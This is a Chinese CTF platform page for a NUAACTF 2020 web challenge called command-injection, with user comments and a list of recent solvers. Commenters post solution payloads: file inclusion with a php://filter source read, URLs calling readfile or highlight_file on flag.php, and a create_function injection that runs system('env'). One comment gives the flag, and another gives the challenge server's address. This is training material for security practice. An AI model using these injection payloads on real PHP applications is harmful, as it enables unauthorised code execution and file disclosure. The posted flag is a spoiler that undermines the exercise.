command-injectionWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 379
提  示:
描  述:
nuaactf{}
评论
i11us0ry 3月前

考点:文件包含、目录扫描、代码审计 /include.php?file=createfun&func=readfile&arg=flag.php

回复 0

solomom 9月前

csdn

回复 0

smtall 1年前

createfun.php?func=highlight_file&arg=flag.php

回复 0

vincentshine 1年前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 2年前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 2年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 2年前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 2年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 2年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 2

hopeinhand 3年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(1)

解题动态

xiaoxiang07 攻破了该题 9天前
dddddddwww 攻破了该题 10天前
Dxmax 攻破了该题 11天前
i8vkmmju 攻破了该题 13天前
pinus 攻破了该题 13天前
时间不会说谎 攻破了该题 14天前
我是小悦主人 攻破了该题 14天前
xiaodou 攻破了该题 15天前
879205607 攻破了该题 15天前
jibabenba 攻破了该题 17天前
壮志凌云 攻破了该题 19天前
Zengan 攻破了该题 20天前
caixinggang 攻破了该题 20天前
AWDAI 攻破了该题 25天前
阿斯蒂芬123 攻破了该题 28天前
nihao123@ 攻破了该题 29天前
vx606v 攻破了该题 1月前
ysecer8 攻破了该题 1月前
WWls= 攻破了该题 1月前
Mu'S'iC 攻破了该题 1月前
问题反馈